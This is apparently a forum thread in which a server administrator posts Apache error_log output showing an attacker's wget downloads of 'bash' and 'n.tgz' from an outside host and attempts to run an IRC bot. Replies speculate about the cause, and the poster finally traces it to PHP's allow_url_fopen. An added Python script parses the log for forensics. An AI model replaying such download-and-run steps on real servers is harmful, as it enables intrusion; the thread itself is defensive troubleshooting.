  1. #1
    Member carock's Avatar
    Join Date
    Sep 2002
    Location
    St. Charles, MO
    Posts
    215

    Question Attacks against Apache in error_log

    I'm trying to figure out how my box is being attacked. I'm looking at the Apache error_log and I find entries like this every once in a while...

    [Mon Aug 22 08:11:18 2005] [error] [client 168.209.98.35] File does not exist: /home/amiga84/public_html/images/form.5B4jpg
    [Mon Aug 22 08:11:18 2005] [error] [client 168.209.98.35] File does not exist: /home/amiga84/public_html/404.shtml
    --08:11:31-- http://wget/
    => `index.html'
    Resolving wget... failed: Host not found.
    --08:11:31-- http://members.lycos.co.uk/icetriton/bash
    => `bash'
    Resolving members.lycos.co.uk... done.
    Connecting to members.lycos.co.uk[212.78.204.20]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 18,649 [text/plain]

    0K .......... ........ 100% 56.38 KB/s

    08:11:32 (56.38 KB/s) - `bash' saved [18649/18649]


    FINISHED --08:11:32--
    Downloaded: 18,649 bytes in 1 files
    sh: line 1: ./bash: Permission denied
    sh: line 1: cd: /var/spool/samba: No such file or directory
    sh: line 1: lwget: command not found
    tar (child): n.tgz: Cannot open: No such file or directory
    tar (child): Error is not recoverable: exiting now
    tar: Child returned status 2
    tar: Error exit delayed from previous errors
    sh: line 1: cd: bot: No such file or directory
    [Mon Aug 22 08:20:01 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/cancun-vacation-deals/404.shtml
    [Mon Aug 22 08:20:15 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/cancun-vacation-deals/images/rollovers/sun$
    [Mon Aug 22 08:20:15 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/cancun-vacation-deals/404.shtml
    [Mon Aug 22 08:20:22 2005] [error] [client 65.54.188.137] File does not exist: /home/amig/public_html/news/1999/0425-amiga.shtml
    [Mon Aug 22 08:20:22 2005] [error] [client 65.54.188.137] File does not exist: /home/amig/public_html/404.shtml
    --08:22:01-- http://members.lycos.co.uk/icetriton/n.tgz
    => `n.tgz'
    Resolving members.lycos.co.uk... done.
    Connecting to members.lycos.co.uk[212.78.204.20]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 217,288 [text/plain]

    0K .......... .......... .......... .......... .......... 23% 80.65 KB/s
    50K .......... .......... .......... .......... .......... 47% 318.47 KB/s
    100K .......... .......... .......... .......... .......... 70% 314.47 KB/s
    150K .......... .......... .......... .......... .......... 94% 337.84 KB/s
    200K .......... .. 100% 1.70 MB/s

    08:22:03 (194.50 KB/s) - `n.tgz' saved [217288/217288]

    sh: line 1: ./bash: Permission denied
    -----------------------------------------------------------
    and so on.

    The weird thing is all the regular log entries in the middle. There's no request or source IPs logged, so I don't know where to go to find out how this person is getting files to upload on the server.

    Anyone deal with this before? I have Apache 1.3.33 and WHM 10.1.0 cPanel 10.2.0-S83 on RedHat 9

    Thanks,
    Chuck
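
An added example, not part of the original post: the lines in the excerpt that lack Apache's `[date] [level]` prefix are stderr from a process spawned by a web request (wget, sh, tar), so their time of day gives a window to search in each virtual host's access_log. The function name, the 60-second slack and the shortened sample are assumptions of this example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample: a shortened copy of the error_log excerpt in the post above.
SAMPLE = """\
[Mon Aug 22 08:11:18 2005] [error] [client 168.209.98.35] File does not exist: /home/amiga84/public_html/404.shtml
--08:11:31-- http://members.lycos.co.uk/icetriton/bash
=> `bash'
sh: line 1: ./bash: Permission denied
sh: line 1: lwget: command not found
[Mon Aug 22 08:20:01 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/cancun-vacation-deals/404.shtml
--08:22:01-- http://members.lycos.co.uk/icetriton/n.tgz
=> `n.tgz'
sh: line 1: ./bash: Permission denied
"""

# Apache 1.3 error_log prefix; a line without it came from a child process's stderr.
APACHE = re.compile(r"^\[(\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4})\] \[\w+\] ")
WGET = re.compile(r"^--(\d\d:\d\d:\d\d)--\s+(\S+)")

def find_stderr_bursts(text, slack_seconds=60):
    """Group lines that lack the Apache prefix into bursts of child-process stderr."""
    bursts, current, last_ts = [], None, None
    pad = timedelta(seconds=slack_seconds)
    for raw in text.splitlines():
        line = raw.strip()
        m = APACHE.match(line)
        if m:  # normal Apache entry: remember its timestamp, close any open burst
            last_ts = datetime.strptime(m.group(1), "%a %b %d %H:%M:%S %Y")
            current = None
            continue
        if not line:  # blank lines inside wget output do not end a burst
            continue
        if current is None:
            current = {"after": last_ts, "urls": [], "lines": [], "window": None}
            bursts.append(current)
        current["lines"].append(line)
        w = WGET.match(line)
        if w:
            current["urls"].append(w.group(2))
            if current["window"] is None and last_ts is not None:
                # wget logs time of day only; the date is assumed to match last_ts
                h, mi, s = map(int, w.group(1).split(":"))
                t = last_ts.replace(hour=h, minute=mi, second=s)
                current["window"] = (t - pad, t + pad)
    return bursts

if __name__ == "__main__":
    for b in find_stderr_bursts(SAMPLE):
        print(b["window"], b["urls"], len(b["lines"]), "stderr lines")
```

Requests in the access_log that fall inside a reported window and carry a URL in a query-string parameter are the ones to examine first.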

  2. #2
    Member
    Join Date
    Feb 2004
    Posts
    14

    Default I have the same errors right now

    I have the same errors right now.
    I found that it is an issue of OpenSSL.
    It is possible for an attacker to gain a shell.
    The attacker usually saves the file to the /tmp or /var/tmp directory.
    He usually runs some 'bot' scripts for IRC, DCC, ...

    I have CentOS 3 and I'm going to reinstall my box to Fedora Core 4.
    CentOS does not provide the OpenSSL updates.
    I also think it will be the same with Fedora 4, but I'll try to build OpenSSL from source
    so later I can easily patch it.

    Roman

  3. #3
    cPanel Partner NOC AndyReed's Avatar
    Join Date
    May 2004
    Location
    Minneapolis, MN
    Posts
    2,223

    Default

    What did you do to secure your server? Do you have a system-based firewall including Mod Security, Mod Evasive, APF and BFD? Are they configured properly and do they have a very good set of rules?

    Do you see any unusual server load?
    Andy Reed
    RHCE and CCNA
    ServerTune.com

  4. #4
    Member
    Join Date
    Feb 2004
    Posts
    14

    Default I have just APF

    I have just APF installed.
    These are the versions on my box:

    Apache 1.3.34

    OpenSSL 0.9.7a

    PHP 4.4.2

  5. #5
    Member
    Join Date
    Feb 2004
    Posts
    14

    Default Found a solution

    It is quite a known bug in PHP.
    To solve this I had to set allow_url_fopen = Off in php.ini
